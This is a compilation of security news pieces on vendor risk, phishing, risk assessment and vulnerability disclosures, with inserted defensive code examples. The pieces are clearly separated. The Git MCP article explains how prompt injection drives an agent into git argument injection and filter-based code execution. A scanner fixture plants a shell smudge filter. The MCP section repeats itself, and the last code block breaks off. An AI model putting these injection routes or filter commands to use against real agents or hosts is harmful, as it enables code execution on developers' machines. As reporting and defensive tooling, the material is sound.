“Many organizations still defend their environments as if threats march up to the front gate when in reality the most effective attackers slip in through the service corridors that nobody monitors,” Alford says. “The Marks & Spencer situation proved this: A help desk workflow became a quiet passage into production because it relied on trust by default.” There appeared to be no strong caller verification processes, no step-up checks, and no guardrails on what support staff could change, he adds.
The Salesforce ecosystem breaches demonstrate another common blind spot: Once attackers capture a token or exploit a permissive integration, they gain the full authority of a trusted insider. “Companies that rely on perimeter controls and MFA alone never see this risk because they are not watching the right places,” Alford says.
The CSO’s role in vetting IT vendors
Cyber obligations are already written into IT services and SaaS contracts, but “there are limits to what companies can do,” says Stephen Lilley, partner at law firm Mayer Brown. “Companies are unlikely to be able to impose cyber requirements that go beyond what is commonly seen in the relevant market. And even sophisticated companies still experience cyber incidents — meaning that IT providers, like their customers, are unable to entirely eliminate the risk from these attacks.”
Although risk eradication is not possible, better mitigation is. Here, CSOs can play a crucial role.
“CSOs are uniquely able to see across the full business process — data flows, dependencies, and downstream impact — but many organizations still don’t use that perspective to reassess third-party risk as reliance grows,” says Randy Gross, CISO for CompTIA. “Cross-functional collaboration is a core CSO imperative: partnering early with procurement, legal, IT, and business leaders so security, resilience, and exit risk are designed in, not bolted on.”
When engagements are initiated at the business-unit level or come in below financial approval thresholds, CSOs may not even be aware of them.
“In many organizations, security leaders are brought in only after a contract is executed or — worse — after a security issue arises,” says Melissa Ventrone, leader of law firm Clark Hill’s cybersecurity, data protection, and privacy practice. “They should be involved … [and] their involvement does not need to slow the contracting process.”
In fact, CSOs can act as a “pragmatic technology advisor” says CompTIA’s Gross, seeking critical information they are uniquely qualified to assess.
Vital vendor questions CISOs should ask
To gain that critical information, security leaders and experts recommend CSOs ask IT partners the following cyber-specific questions.
1. What attestation will you provide to prove proper security controls are in place?
These are essential, says Juan Pablo Perez-Etchegoyen, CTO for cybersecurity and compliance platform Onapsis. Some of the most commonly used include:
SOC 2 Type II Report: considered the gold standard audit for IT and cloud service providers
ISO/IEC 27001 certification: an international standard for information security
Cloud Security Alliance STAR: a registry specific to cloud providers that combines ISO 27001 with a controls matrix for cloud-related risks
Industry-specific attestations: for example, HIPAA/HITRUST for handling healthcare data, or PCI DSS for storing or processing credit card data.
2. How do you maintain and update cybersecurity controls over time, and how will we be notified of material changes?
Would-be clients should have IT partners complete a detailed due diligence questionnaire and contractually obligate them to notify the company of any material changes that would require updates to their responses, advises Clark Hill’s Ventrone.
“At a minimum, IT vendors should be prohibited from changing security controls that would decrease the security, protection, or resiliency of its systems and company data,” she says.
3. Who on your team is capable of altering our identity posture, and what prevents a social engineered request from triggering that action?
CSOs can begin with general access inquiries: what access the provider’s team has to customer systems and data, and how that access is segmented and secured, Stratascale’s Corcoran says. Access should be limited by role, with least privilege enforced and multifactor authentication, single sign-on, and network segmentation in place.
Look for “logged, monitored, and immediately revocable access — ideally aligned with access control best practices from the NIST RMF function, which emphasizes least privilege and separation of duties,” Corcoran says.
Then CSOs can get specific. “Many clients focus on firewalls, endpoint agents, and MFA while overlooking the trust pathways that attackers prefer to use,” Alford says. Help desk workflows, OAuth integrations, supplier support portals, and automation connectors typically get less scrutiny even though they can alter identity states or extract large volumes of data with a single action.
CSOs should look for strictly defined role scopes, multi-step verification, step-up authentication, and approval chains for credential resets. “Anything short of that signals a blind spot that no amount of technical hardening will cover,” says Alford.
4. How can we verify the workflows you use when onboarding, offboarding, or resetting access, and can you show evidence of how these workflows performed last quarter?
Many companies underestimate how much operational trust they blindly hand over to providers. IT partners should offer workflow maps, execution logs, and testing records, not just policy documents.
“The most significant gaps appear in the places people assume are safe. I have seen mature organizations with strong 27001 programs, disciplined PCI controls, and well-run internal security teams fall to issues that lived entirely inside vendor workflows,” Alford notes. “Help desk resets, poorly scoped automation tokens, and inherited admin rights all surfaced in post-incident reviews as quiet pathways that no one had modeled.”
Risk assessments should focus not just on servers and networks but identity workflows and human-operated processes as well. “When you widen the lens, you often discover controls that look strong on paper but behave differently in practice,” Alford says.
5. What independent testing do you conduct, and how often is it performed?
IT partners should have a third party run security tests and assessments, and provide copies or executive summaries of these vulnerability scans, penetration tests, and other audits at least annually and whenever there are material changes to their network, infrastructure, or security controls, Clark Hill’s Ventrone says.
ThreatLocker CEO Danny Jenkins stresses frequency: “Threats are always evolving, so a once-a-year audit is not sufficient. All systems should be undergoing regular penetration testing and improvement.” 
6. Can you list every OAuth integration and privileged API relationship in your service and explain how each is scoped, rotated, monitored, and revoked?
“OAuth integrations are often treated as harmless conveniences rather than high-privilege conduits,” Alford explains. “In reality, they function like a network of forgotten tunnels. They bypass the front gate entirely and connect systems deep inside the environment.”
Companies should ask service partners to provide a token inventory, minimal scopes, finite lifetimes, and behavioral monitoring. Broad or permanent tokens are red flags, signaling elevated risk.
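The token inventory review described above, as an added example (not from the article or from any vendor it names): a constructed list of OAuth grants is checked for broad scopes, missing expiry, credentials that were never rotated, and grants nobody uses. The set of scopes treated as broad, the age and idle thresholds, and the sample grants are assumptions for this example; Salesforce’s “full” and “api” scopes are real examples of the broad class.

```python
# Added example (not from the article or any vendor mentioned in it): audit a
# constructed OAuth grant inventory for the red flags the text lists.
# BROAD_SCOPES, the thresholds and the grants are assumptions.
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Scopes that hand an integration the full authority of the granting user.
BROAD_SCOPES = {"full", "api", "*"}
MAX_AGE_DAYS = 365     # a credential older than this has never been rotated
MAX_IDLE_DAYS = 60     # a grant nobody used in this window should be revoked


@dataclass(frozen=True)
class Grant:
    app: str
    scopes: frozenset
    issued: date
    expires: Optional[date]     # None: the refresh token never expires
    last_used: Optional[date]   # None: never used since issuance


def flags_for(g: Grant, today: date) -> list:
    flags = []
    if g.scopes & BROAD_SCOPES:
        flags.append("broad-scope")
    if g.expires is None:
        flags.append("no-expiry")
    elif g.expires < today:
        flags.append("expired-not-revoked")
    if (today - g.issued).days > MAX_AGE_DAYS:
        flags.append("not-rotated")
    if (today - (g.last_used or g.issued)).days > MAX_IDLE_DAYS:
        flags.append("idle")
    return flags


def audit(grants, today: date) -> dict:
    """Map each flagged app to its red flags; clean grants are omitted."""
    result = {}
    for g in grants:
        f = flags_for(g, today)
        if f:
            result[g.app] = f
    return result


# Constructed inventory, as exported from an identity provider or SaaS admin console.
TODAY = date(2026, 1, 20)
GRANTS = [
    Grant("crm-sync", frozenset({"api", "refresh_token"}), date(2024, 1, 10), None, date(2025, 12, 1)),
    Grant("ticket-bot", frozenset({"read:tickets"}), date(2025, 9, 1), date(2026, 3, 1), date(2025, 9, 3)),
    Grant("mail-relay", frozenset({"send:mail"}), date(2025, 12, 15), date(2026, 3, 15), date(2026, 1, 10)),
]

if __name__ == "__main__":
    for app, flags in audit(GRANTS, TODAY).items():
        print(f"{app:12} {', '.join(flags)}")
```

The “crm-sync” grant is the shape of the Salesloft Drift problem described earlier on this page: a broad API scope on a refresh token with no expiry that has not been rotated in two years. The check is only as good as the inventory it runs over, which is why the question asks the provider to list every integration, not just the ones it remembers.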
7. If an attacker abused one of your processes without breaching your systems, what are your contractual and operational commitments?
“These agreements often hand providers the practical ability to alter identity states, access sensitive data, or operate parts of the production environment. That level of delegated trust deserves the same scrutiny as hiring a senior operations leader,” says Alford. “When providers can reset passwords or manage OAuth integrations, the contract becomes a control document. It defines how risk will be shared and what evidence the client can demand.”
Without CSO involvement, contractual clauses are usually weak. “They focus on uptime rather than security, and they rarely require the provider to support strong authentication, tamper-evident logging, or event-level transparency,” Alford adds. Clients should insist on obligations tied to process compromise, not just system compromise.
8. What controls govern your staff’s activity in our environment, and how would we detect if a privileged session deviated from expected behavior?
“Modern attacks flow through trust relationships and soft operational processes,” Alford points out. “They exploit the places where no one expects danger — like help desks.”
As a result, controls on vendor staff behavior and detection of deviations are critical. Companies should insist on session recording, real-time alerts, and segregation of duties, Alford advises.
“Rapid detection and revoking access can make all the difference in an incident,” Onapsis’ Perez-Etchegoyen adds. Continuous application-level monitoring, clear incident response procedures, and the ability to immediately disable users or integrations are key.
9. How will you isolate our assets and data from other customers — including identity separation, automation boundaries, and admin segregation?
CSOs should seek architectural clarity and concrete mechanisms that limit blast radius, says Alford. They should also ask how the IT partner manages the cybersecurity risks posed by their value chains of vendors and subcontractors.
“IT partners should have a robust vendor management program and conduct appropriate due diligence on their own service providers,” advises Ventrone.
10. How quickly will you notify us of a security incident that impacts our data or systems?
“The biggest gains come from simple steps,” says CompTIA’s Gross, including gaining clarity on how incidents are disclosed and outages are handled.
CSOs should look for guaranteed notification within 24 to 72 hours, a tested incident response plan, and clearly defined breach reporting timelines and responsibilities written into the contract, says Stratascale’s Corcoran.
When an incident occurs, “IT partners should provide customers with sufficient information to perform their own threat analysis,” Alford says. “If an IT partner doesn’t provide the insight needed to identify attacks against their customers, then customer organizations can only rely on the detection and reporting capabilities of the hosting provider.”
11. How do you identify, prioritize, and remediate vulnerabilities?
Reviewing an IT partner’s patching policies and remediation timelines should never be overlooked, since many cyberattacks exploit known vulnerabilities. “Slow patch cycles lead to supply chain disruptions, business operational issues, and even bankruptcy in some cases,” says Perez-Etchegoyen, who emphasizes SLAs related to critical patches and proof that fixes are validated.
Ventrone gives the example of a company that outsourced firewall management to a vendor. After a vulnerability in the firewall was exploited, the vendor ended up restoring the vulnerable version, resulting in a second compromise. In another example, a client found out that its IT partner, which had experienced a ransomware attack through its VPN, patched just once a month.
“I literally could not believe this was considered sufficient,” Ventrone says.
12. Do you carry enough cyber insurance to cover the impact to all your customers?
“We’re going to see a lot more attacks against SaaS providers,” says SANS Institute’s Wright. “Attackers have lots of motive here since the access obtained when a SaaS provider is compromised is significant, with lots of subsequent opportunity for ransomware, extortion, and direct harassment attacks against customers.”
Ventrone says clients should confirm their provider’s policy covers not only themselves but the full impact of a multi-customer incident.
13. Can we test your processes?
Attestations regarding cybersecurity testing and monitoring — such as regular penetration testing, 24/7/365 security monitoring, threat hunting — are essential, Wright says.
But Alford recommends going a step further. “Lots of firms do questionnaire-based reviews that confirm policies exist but rarely test how provider processes work in practice. They assume a support vendor has strong verification steps. They assume an integration partner follows least privilege. They assume a SaaS platform has adequate logging for delegated access,” says Alford, warning against presumptions.
“Verification through evidence, realistic scenarios, and process testing changes everything,” he says. “It exposes where risk actually lives and gives you the ability to design controls that match how attackers think rather than how documentation reads.”
Ongoing diligence necessary
“Recent incidents underscore that many organizations are not adequately managing third-party risk over the full lifecycle of their IT provider relationships,” notes Clark Hill’s Ventrone, adding that too often due diligence is treated as a one-time exercise, with insufficient ongoing oversight to ensure that security controls and procedures remain appropriate as systems evolve.
Stratascale’s Corcoran also notes that cyber due diligence often falls through the cracks. “Many client organizations still fall short in managing third-party risk because it’s often treated as a collateral duty, split between procurement and general risk functions rather than a dedicated, optimized process,” he says. “As a result, business stakeholders remain unsatisfied and critical risks go unmitigated, even as attackers increasingly exploit weaker links in the supply chain.”
Increasingly, partners in the IT ecosystem are being seen by cybercriminals to be those weaker links.
View the full article
LastPass is alerting users to a new active phishing campaign that's impersonating the password management service, which aims to trick users into giving up their master passwords. The campaign, which began on or around January 19, 2026, involves sending phishing emails claiming upcoming maintenance and urging them to create a local backup of their password vaults in the next 24 hours. The
View the full article
From a certain age, many people regularly visit their doctor for check-ups. In this way, risks and dangers can be identified early and appropriate measures taken.
The same applies to cybersecurity: Regular risk assessments help security teams identify vulnerabilities and areas for improvement. Unfortunately, such assessments are not carried out universally.
Advantages of a cyber risk assessment
CISOs benefit from the following advantages when they integrate cybersecurity risk assessments into their work:
Identifying vulnerabilities: A cyber risk assessment helps to identify security gaps in a company’s IT infrastructure, networks, and systems. This provides the opportunity to eliminate these vulnerabilities before they can be exploited by cybercriminals.
Prioritize risk management measures: Not every system is critical, and not all of a company’s data is equally important. The results of the risk assessment clarify which assets and systems are most critical and at the highest risk of attack. Based on this, security managers can prioritize their measures and thus allocate their resources more effectively to address the most critical risks first.
Meeting compliance requirements: Almost every company must comply with various data protection and data security regulations, such as the GDPR or the Payment Card Industry Data Security Standard (PCI DSS). Many of these legal requirements explicitly demand specific risk assessments, such as a data protection impact assessment under the GDPR. Risk assessments help to meet the compliance requirements of various regulations. This ensures that the necessary security standards are met and that potential fines or legal consequences for violations are avoided.
Make smart decisions and reduce costs: Cyber risk assessments give companies a comprehensive understanding of their cyber risks. This allows them to make informed decisions about risk mitigation strategies, thereby reducing the likelihood of a successful and costly cyberattack. Furthermore, it enables them to make targeted and therefore more effective investments in their cybersecurity.
A look at data risk
The target of most cyberattacks is a company’s data — with enormously costly consequences: According to IBM’s Cost of a Data Breach Report 2025, a data breach caused an average of $4.44 million in damages. Therefore, it is crucial to take a close look at data and the risks it faces.
This is all the more important because, unlike infrastructure and other systems, data cannot be “un-compromised.” Servers can be reconfigured and cloud instances rebuilt, but once data is stolen it remains in the hands of cybercriminals, and backups offer no protection against that.
An analysis of nearly 10 billion cloud objects, conducted as part of data risk assessments at more than 700 companies across various industries worldwide, reveals the risks that data is generally exposed to. According to the analysis, one in 10 data sets in the cloud is accessible to all employees. This creates an internal blast radius that significantly increases the potential damage from a ransomware attack: any single compromised employee account can reach that data.
However, a lack of multifactor authentication (MFA) also makes it easier for attackers to compromise internally exposed data: Microsoft has found that more than 99% of compromised accounts do not have MFA.
Conclusion
These general findings already highlight the biggest problem areas. Nevertheless, it is important to determine the individual data risk and identify weaknesses within the framework of a data risk assessment.
Companies typically don’t know what data they possess, where it’s stored, or who has access to it. Only with this fundamental information can they identify their risks and take targeted measures. The time investment is manageable, at around two to four hours, and a comprehensive report provides immediately actionable recommendations. Furthermore, the assessment process often uncovers additional security issues, ranging from ongoing cyberattacks to Kerberos passwords that are up to 15 years old.
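The two checks behind the figures in this article, as an added example (not the assessment tooling the article describes): an org-wide exposure count over a constructed cloud object inventory, and a stale-password and missing-MFA check over constructed account records. The group names treated as “all employees”, the one-year password threshold and all sample data are assumptions for this example.

```python
# Added example (not the article's tooling): compute the share of objects
# readable by the whole company and flag accounts with stale passwords or no
# MFA, over constructed inventory data. ORG_WIDE and thresholds are assumptions.
from dataclasses import dataclass
from datetime import date

# Principals whose membership is effectively the whole company; adjust per tenant.
ORG_WIDE = {"Everyone", "Domain Users", "all-employees@example.com"}
STALE_PASSWORD_DAYS = 365


@dataclass(frozen=True)
class CloudObject:
    path: str
    readers: frozenset   # principals with read access


@dataclass(frozen=True)
class Account:
    name: str
    pwd_last_set: date
    mfa_enrolled: bool


def org_wide_exposed(objects):
    """Paths that any employee can read, i.e. the ransomware blast radius."""
    return [o.path for o in objects if o.readers & ORG_WIDE]


def exposure_ratio(objects):
    return len(org_wide_exposed(objects)) / len(objects)


def account_findings(accounts, today):
    """Map account name to its findings; password age is reported in whole years."""
    findings = {}
    for a in accounts:
        f = []
        age_days = (today - a.pwd_last_set).days
        if age_days > STALE_PASSWORD_DAYS:
            f.append(f"password-age-{age_days // 365}y")
        if not a.mfa_enrolled:
            f.append("no-mfa")
        if f:
            findings[a.name] = f
    return findings


# Constructed inventory: ten objects, one of them shared with the whole domain.
OBJECTS = (
    [CloudObject(f"/finance/q{i}-report.xlsx", frozenset({"finance-team"})) for i in range(1, 5)]
    + [CloudObject(f"/eng/design-{i}.md", frozenset({"eng-team"})) for i in range(1, 6)]
    + [CloudObject("/hr/salary-bands.xlsx", frozenset({"hr-team", "Domain Users"}))]
)
TODAY = date(2026, 1, 20)
ACCOUNTS = [
    Account("alice", date(2025, 11, 1), True),
    Account("bob", date(2024, 6, 1), True),
    Account("svc-backup", date(2011, 3, 2), False),   # a service account nobody rotated
]

if __name__ == "__main__":
    print(f"org-wide exposure: {exposure_ratio(OBJECTS):.0%} -> {org_wide_exposed(OBJECTS)}")
    for name, f in account_findings(ACCOUNTS, TODAY).items():
        print(f"{name:12} {', '.join(f)}")
```

The service account is the interesting finding: it has the kind of password age the article reports, it has no MFA, and its name suggests it can read everything the backups can. Those three facts together, not any one of them, are what make it the first item on the remediation list.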
Regularly conducted cyber risk assessments allow for clear and verifiable documentation of progress in data security — also for management. CISOs finally have a tool at their disposal that makes their cybersecurity successes visible.
View the full article
A security vulnerability has been disclosed in the popular binary-parser npm library that, if successfully exploited, could result in the execution of arbitrary JavaScript. The vulnerability, tracked as CVE-2026-1245 (CVSS score: N/A), affects all versions of the module prior to version 2.3.0, which addresses the issue. Patches for the flaw were released on November 26, 2025. Binary-parser is a
View the full article
Third Party Risk Management helps companies avoid the risk of compliance violations.
Photo: Diyajyoti – shutterstock.com
In the age of digitalization, companies cannot do without the support of third-party providers. Whether for IT infrastructure or data processing, external service providers help make business processes more effective and efficient. But working with third parties also brings risk. Companies should therefore establish Third Party Risk Management (TPRM).
What is Third Party Risk Management?
TPRM is a strategic approach that aims to identify, assess, and manage the risk of working with third-party providers. It helps companies better understand and manage the risks associated with their third-party providers in order to avoid compliance violations.
Why is TPRM important? “Companies must, for example, verify that their third-party providers comply with the SOC 2 audit standard, which is meant to ensure that third-party providers protect sensitive customer data from unauthorized access,” explains GreenPages manager Pasteris, adding: “Data protection laws such as the GDPR are also relevant here. If you yourself are compliant, that does you no good at all if your third-party provider follows nothing.”
Read also: 5 ways to go under with third-party providers
Core components of an effective TPRM strategy
A Third Party Risk Management program should include the following:
Risk identification and assessment: The first step in the TPRM process is identifying and assessing the risks associated with working with third-party providers. This includes analyzing the providers’ security measures, data protection practices, and compliance standards. Companies should conduct detailed due diligence to identify potential weaknesses and risks.
Contract management: Another important aspect of TPRM is implementing contract clauses that define the third-party providers’ responsibilities with regard to compliance violations. Companies must have clear expectations of their providers, and those expectations must be set down in writing. This helps protect companies from legal consequences in the event of compliance violations by third parties.
Monitoring and audits: An effective TPRM strategy also includes continuous monitoring of third-party providers to ensure that they continue to meet the requirements. This can be done through regular audits and reviews. Companies should make sure they have the resources and tools needed to verify their providers’ adherence to the compliance standards.
Training and awareness: Training employees and raising their awareness of the risks and requirements of TPRM is also crucial. Employees should understand why TPRM matters and how they can help minimize the risks. Regular training sessions and workshops can strengthen awareness of TPRM and ensure that all employees adhere to the compliance standards.
Best practices for successful TPRM
These four tips help with TPRM implementation:
Establish clear policies and procedures: Companies should develop and implement clear policies and procedures for TPRM. These should cover all aspects of TPRM, including the selection of third-party providers, contract design, monitoring, and reporting.
Use technology: Technology can make TPRM considerably easier. Numerous tools and platforms help companies identify, assess, and monitor risks. These tools can also help automate audits and reporting.
Integrate TPRM into Enterprise Risk Management (ERM): TPRM should not be treated in isolation but integrated into the company’s overall risk management. This ensures that all risks, including those originating from third-party providers, are considered and managed holistically.
Review and update regularly: The TPRM strategy should be reviewed regularly and updated as needed to ensure that it reflects current threats and compliance requirements. Companies should take proactive steps to continuously improve their TPRM strategy.
Secure business processes with TPRM
Third Party Risk Management is an essential part of the compliance strategy of every company that works with third-party providers. By implementing an effective TPRM strategy, companies can minimize the risk of compliance violations by third parties and protect themselves from legal consequences. Identifying and assessing risks, contract management, continuous monitoring, and employee training are the decisive components of a successful TPRM. (jm)
View the full article
Threat actors could use prompt injection attacks to take advantage of three vulnerabilities in Anthropic’s official Git MCP server and cause mayhem with AI systems.
This alert comes from researchers at Israel-based Cyata, which urges infosec leaders to make sure corporate developers using the official GIT MCP server update to the latest version as soon as possible.
The risk is that an attacker could run unapproved code or tamper with a large language model (LLM), compromising its output.
While the official Git MCP server can be exploited on its own, “the toxic combination is when both the Git MCP server and a Filesystem MCP server are enabled,” Cyata CEO Shahar Tal said in an interview. “Then that [AI] agent is at critical risk. We urge people to use the latest versions [of both applications].”
At risk are developers using mcp-server-git versions prior to 2025.12.18.
The three vulnerabilities are
· CVE-2025-68143, an unrestricted git_init.
· CVE-2025-68145, a path validation bypass.
· CVE-2025-68144, an argument injection in git_diff.
Unlike other vulnerabilities in MCP servers that required specific configurations, these work on any configuration of Anthropic’s official server, out of the box, Cyata says.
Model Context Protocol (MCP) is an open standard introduced by Anthropic in 2024 to provide a unified way for AI assistants (such as Claude Desktop, Cursor, Windsurf, and others) to interact with external tools and data sources including filesystems, databases, APIs, and development tools like Git.
MCP servers expose capabilities to the AI, acting as a bridge between the LLM and external systems.
As Cyata points out in its blog, MCP servers execute actions based on LLM decisions. If an LLM can be manipulated through prompt injection, a threat actor can influence the AI’s context to trigger MCP tool calls with attacker-controlled arguments.
Since Anthropic released its model, thousands of vendors and third party providers have released official MCP servers. There are also unofficial servers for online platforms like LinkedIn. And, as might be expected, there are dodgy MCP servers circulating from crooks.
Related content: What CISOs need to know about securing MCP servers
It isn’t known how many enterprise developers use mcp-server-git, the official Git MCP server maintained by Anthropic. Nor is it known how many also use Filesystem MCP Server.
Threat actors could use prompt injection attacks to take advantage of three vulnerabilities in Anthropic’s official Git MCP server and cause mayhem with AI systems.
This alert comes from researchers at Israel-based Cyata, which urges infosec leaders to make sure corporate developers using the official Git MCP server update to the latest version as soon as possible.
The risk is that an attacker could run unapproved code or tamper with a large language model (LLM), compromising its output.
While the official Git MCP server can be exploited on its own, “the toxic combination is when both the Git MCP server and a Filesystem MCP server are enabled,” Cyata CEO Shahar Tal said in an interview. “Then that [AI] agent is at critical risk. We urge people to use the latest versions [of both applications].”
At risk are developers using mcp-server-git versions prior to 2025.12.18.
The three vulnerabilities are:
· CVE-2025-68143, an unrestricted git_init
· CVE-2025-68145, a path validation bypass
· CVE-2025-68144, an argument injection in git_diff
Unlike other vulnerabilities in MCP servers that required specific configurations, these work on any configuration of Anthropic’s official server, out of the box, Cyata says.
Model Context Protocol (MCP) is an open standard introduced by Anthropic in 2024 to provide a unified way for AI assistants (such as Claude Desktop, Cursor, Windsurf, and others) to interact with external tools and data sources including filesystems, databases, APIs, and development tools like Git.
MCP servers expose capabilities to the AI, acting as a bridge between the LLM and external systems.
As Cyata points out in its blog, MCP servers execute actions based on LLM decisions. If an LLM can be manipulated through prompt injection, a threat actor can influence the AI’s context to trigger MCP tool calls with attacker-controlled arguments.
Since Anthropic released the protocol, thousands of vendors and third-party providers have released official MCP servers. There are also unofficial servers for online platforms like LinkedIn. And, as might be expected, malicious MCP servers circulated by criminals are also in the wild.
Related content: What CISOs need to know about securing MCP servers
It isn’t known how many enterprise developers use mcp-server-git, the official Git MCP server maintained by Anthropic. Nor is it known how many also use Filesystem MCP Server.
Cyata researcher Yarden Porat first discovered that when the git_init tool is called, mcp-server-git uses the path it is given without validation, so an attacker can have the agent create a new git repository anywhere on disk, with attacker-controlled content that the LLM will then read.
The second hole is argument injection: a git_diff parameter is passed straight to the git command line without sanitization, so a threat actor can inject any git flag, including one that redirects git’s output to a file of the attacker’s choosing and overwrites it. Third, it was discovered that an attacker could also delete files. Finally, the researchers found that attackers could use git’s clean and smudge filters, commands that git itself runs when files are staged or checked out, to execute code.
“All you have to know — and it depends on the agent you’re attacking — is how to get the [AI] agent to read something you control,” said Tal. “That is quite widespread. It’s a very wide attack surface.”
Related content: Top 10 MCP vulnerabilities
Cyata says defensive action not only means updating mcp-server-git to version 2025.12.18 or later, but also auditing which MCP servers run together. Combining Git + Filesystem increases the attack surface, the researchers say.
Admins should also monitor for unexpected .git directories in non-repository folders.
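A scanner for the monitoring advice above, added here as an example; it is not code from Cyata or from mcp-server-git. It walks a tree, reports every directory holding a .git that is not in an allowlist of known repositories (including one planted inside a known repository, which an unrestricted git_init permits), and lists any clean/smudge filter drivers configured in each repository it finds, since those are the commands git runs on checkout and staging. The allowlist policy, the directory tree and the filter entry that demo() builds are constructed for illustration.

```python
"""Find .git directories where no repository is expected, and list any
clean/smudge filter drivers configured in each repository found.

Added example, not Cyata's or mcp-server-git's code. The tree and the filter
entry built by demo() are constructed; the known-repo allowlist is an assumption.
"""
import os
import re
import shutil
import tempfile
from pathlib import Path

# Minimal reader for git's INI dialect: [section "subsection"] headers and
# tab-indented key = value lines (configparser would treat the indented
# lines as continuations, so we do not use it).
SECTION_RE = re.compile(r'^\s*\[([^\s\]]+)(?:\s+"([^"]*)")?\]\s*$')
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')


def filter_drivers(git_dir):
    """Return (filter_name, key, command) for every clean or smudge driver in
    <git_dir>/config. Git runs these commands when files are staged or checked
    out, so any entry in an unexpected repository deserves a look."""
    config = Path(git_dir) / "config"
    if not config.is_file():
        return []
    section = subsection = None
    drivers = []
    for line in config.read_text(errors="replace").splitlines():
        m = SECTION_RE.match(line)
        if m:
            section, subsection = m.group(1).lower(), m.group(2)
            continue
        m = KEY_RE.match(line)
        if m and section == "filter" and m.group(1).lower() in ("clean", "smudge"):
            drivers.append((subsection, m.group(1).lower(), m.group(2)))
    return drivers


def scan(scan_root, known_repos):
    """Walk scan_root and report every directory holding a .git: whether it is
    one of known_repos, and its filter drivers. Repositories nested inside a
    known one are reported too, since git_init can plant one anywhere."""
    expected = {Path(p).resolve() for p in known_repos}
    report = []
    for dirpath, dirnames, _files in os.walk(Path(scan_root).resolve()):
        if ".git" not in dirnames:
            continue
        repo = Path(dirpath)
        report.append({"repo": repo, "expected": repo in expected,
                       "filters": filter_drivers(repo / ".git")})
        dirnames.remove(".git")  # never descend into git's own metadata
    return sorted(report, key=lambda r: str(r["repo"]))


def demo():
    """Constructed tree: one known repo, one planted inside it with a smudge
    filter, one in Downloads. Returns the findings relative to the tree."""
    base = Path(tempfile.mkdtemp()).resolve()
    try:
        for rel in ("known/.git", "known/src/planted/.git", "Downloads/.git",
                    "Documents/notes"):
            (base / rel).mkdir(parents=True)
        (base / "known/src/planted/.git/config").write_text(
            '[core]\n\tbare = false\n[filter "lfs"]\n'
            "\tsmudge = sh -c 'touch /tmp/planted-ran'\n\tclean = cat\n")
        return [{"repo": r["repo"].relative_to(base).as_posix(),
                 "expected": r["expected"], "filters": r["filters"]}
                for r in scan(base, [base / "known"])]
    finally:
        shutil.rmtree(base)
```

Run scan() over developer home directories and agent working directories with the list of repositories your tooling is supposed to manage; anything reported with expected False, or with a non-empty filters list in a repository nobody configured that way, is worth investigating.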
“Generally, it is very hard to protect against vulnerabilities in MCP servers,” said Tal. “Most assistant type agents don’t even let you sanitize parameters. Homegrown agents could include various prompt injection defenses, but none are fail-proof.”
Cyata says it reported the first problem to Anthropic through the HackerOne bug bounty platform on June 24, 2025; Anthropic initially marked it as informative. After Cyata reported the prompt injection issue, Anthropic took another look, but it wasn’t until September 10 that the report was accepted. The new version of the Git MCP server was released December 18.
In an interview, Porat suggested there wasn’t much that infosec leaders or developers could have done between the discovery of the vulnerability and the release of the more secure version of Git MCP Server. A prompt injection attack would work on the unpatched version even in its most secure configuration, he said.
“You need guardrails around each [AI] agent and what it can do, what it can touch,” Tal added. “You need to also, if there is an incident, be able to look back at everything the agent did.”
The problem with MCP servers is that they give the LLM access to execute sensitive functions, commented Johannes Ullrich, dean of research at the SANS Institute. “How much of a problem this is depends on the particular features they have access to. But once an MCP server is configured, the LLM will use the content it receives to act on and execute code (in this case, in git).
“Sadly, it is very unlikely that this will be the last time we see a prompt injection in this system. There is no simple fix for prompt injections, and usually you are going to create band-aids to prevent specific exploits. For an MCP server like this, the best option is to restrict the data it operates on, so it uses only data from trusted sources, and the functionality it can access. Some fine-grained access control can be used to implement this.”
Tanya Janca, a Canada-based secure coding trainer, said that to mitigate potential issues, development teams using MCP should limit access and privileges for MCP servers (no root, read-only access, local access only) and give users only the least privileges they need. Admins should validate file paths completely, not just by prefix matching, resolve symlinks properly, always perform careful input validation, and use parameterized queries.
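The two input classes discussed in this article, the git_diff argument injection described earlier and the path validation advice just above, in working code. This is an added example, not mcp-server-git's code or its fix: the function names, the allowed-roots policy, and the directory tree that demo() builds (including a symlink that escapes the root) are assumptions for illustration. The prefix-matching check is shown only as the pattern to avoid.

```python
"""Repository path validation and git argument handling for a git-backed tool.

Added example, not mcp-server-git's code. Function names, the allowed-roots
policy and the tree built by demo() are assumptions for illustration.
"""
import os
import shutil
import subprocess
import tempfile
from pathlib import Path


def unsafe_is_under_root(requested, root):
    """Prefix matching, the check the advice above warns against: a sibling
    such as /srv/repos-evil passes for root /srv/repos, and neither symlinks
    nor '..' are ever resolved."""
    return str(requested).startswith(str(root))


def safe_repo_path(requested, allowed_roots):
    """Resolve symlinks and '..' first, then require the result to be one of
    the allowed roots or to lie beneath one. Raises PermissionError otherwise."""
    resolved = Path(requested).resolve(strict=False)
    for root in allowed_roots:
        root = Path(root).resolve()
        if resolved == root or root in resolved.parents:
            return resolved
    raise PermissionError(f"{requested} resolves to {resolved}, outside allowed roots")


def safe_git_values(values):
    """Refuse any value git could parse as an option (leading '-'), so a tool
    parameter cannot smuggle a flag such as --output=<file> into the command."""
    clean = []
    for v in values:
        if not isinstance(v, str) or not v or v.startswith("-"):
            raise ValueError(f"refusing option-like git argument: {v!r}")
        clean.append(v)
    return clean


def git_diff_argv(repo, revisions=(), paths=()):
    """argv for git diff: fixed options first, validated revisions next, and
    user-supplied paths only after '--', where git treats everything as a
    pathspec and never as an option."""
    return (["git", "-C", str(repo), "diff", "--no-ext-diff"]
            + safe_git_values(revisions) + ["--"] + safe_git_values(paths))


def run_git_diff(repo, allowed_roots, revisions=(), paths=()):
    """Validate both inputs, then run git without a shell so nothing is re-parsed."""
    argv = git_diff_argv(safe_repo_path(repo, allowed_roots), revisions, paths)
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


def demo():
    """Exercise the path checks against a constructed tree with a symlink escape."""
    base = Path(tempfile.mkdtemp()).resolve()
    try:
        root = base / "repos"
        (root / "app").mkdir(parents=True)
        (base / "outside").mkdir()
        os.symlink(base / "outside", root / "escape")  # symlink pointing out of root
        results = {
            "prefix_check_fooled": unsafe_is_under_root(f"{root}-evil/x", root),
            "in_root_allowed": safe_repo_path(root / "app", [root]) == root / "app",
        }
        for name, candidate in (("symlink_blocked", root / "escape" / "x"),
                                ("sibling_blocked", f"{root}-evil/x"),
                                ("dotdot_blocked", root / "app" / ".." / ".." / "outside")):
            try:
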